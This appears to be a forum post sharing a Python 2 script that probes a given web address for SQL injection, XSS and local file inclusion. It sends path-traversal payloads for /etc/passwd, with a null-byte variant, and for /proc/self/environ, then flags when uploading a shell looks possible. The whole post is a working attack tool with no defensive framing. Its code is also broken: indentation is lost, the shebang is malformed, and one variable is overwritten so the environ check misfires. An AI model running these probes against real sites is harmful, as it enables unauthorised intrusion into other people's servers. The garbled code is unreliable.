13 Years of Service
24%
Code:
>#!usr/bin/python
import os, sys, urllib
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = ' clear'
else:
clearing = 'cls'
os.system(clearing)
print("################################################")
print("# SQli,XSS,LFI scanner by Quetzalcoatl #")
print("# Version 1.0 12/04/2012 #")
print("# Greetz to Baltazar,c0ax... #")
print("# http://www.ljuska.org #")
print("# Ex: http://www.somesite.com/index.php?id=1 #")
print("################################################")
sqligreska1 = "You have an error"
sqligreska2 = "Query failed"
sqligreska3 = "mysql_fetch_array()"
htmlxsstext = 'ljuska'
lfigreska = "root:x:0:0"
lfienviron = "DOCUMENT_ROOT"
lfienviron = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ"
lfitext = "../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
lfitextnull = "../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
jsxsstext = """"document.write('XSSLjuska') """
link = raw_input("Link za skeniranje: ")
xsshtml = link + htmlxsstext
str = link;
trebami, netrebami = str.split('=')
urllib.urlretrieve(xsshtml,'xsshtml.txt')
print ""
xssjs = link + jsxsstext
urllib.urlretrieve(xssjs,'xssjs.txt')
sqli = link + "'"
urllib.urlretrieve(sqli,'sqli.txt')
xsshtmltext = open("xsshtml.txt","r").read()
if htmlxsstext in xsshtmltext :
print "XSS HTML [+]"
print ""
else :
print "XSS HTML [-]"
print ""
xssjstext = open("xssjs.txt","r").read()
if jsxsstext in xssjstext :
print "XSS JS [+]"
print ""
else :
print "XSS JS [-]"
print ""
sqlitext = open("sqli.txt","r").read()
if sqligreska1 in sqlitext :
print "SQLi [+]"
print ""
else :
if sqligreska2 in sqlitext :
print "SQLi [+]"
print ""
else :
if sqligreska3 in sqlitext :
print "SQLi [+]"
print ""
else :
print "SQLi [-]"
print ""
lfietc = trebami+'=' + lfitext
lfietc1 = trebami+'=' + lfitextnull
lfiproc = trebami+'='+lfienviron
urllib.urlretrieve(lfiproc,'lfiproc.txt')
urllib.urlretrieve(lfietc,'lfi.txt')
urllib.urlretrieve(lfietc1,'lfi1.txt')
lfiprocenviron = open("lfiproc.txt","r").read()
lfietctext = open("lfi.txt","r").read()
lfietctext1 = open("lfi1.txt","r").read()
if lfigreska in lfietctext :
print "LFI [+]"
print ""
if lfienviron in lfiprocenviron :
print "It's possible to upload shell"
else :
if lfigreska in lfietctext1 :
print "LFI [+] with nullbyte"
print ""
else :
print "LFI [-]"
print ""
os.remove("lfiproc.txt")
os.remove("lfi.txt")
os.remove("lfi1.txt")
os.remove("xssjs.txt")
os.remove("xsshtml.txt")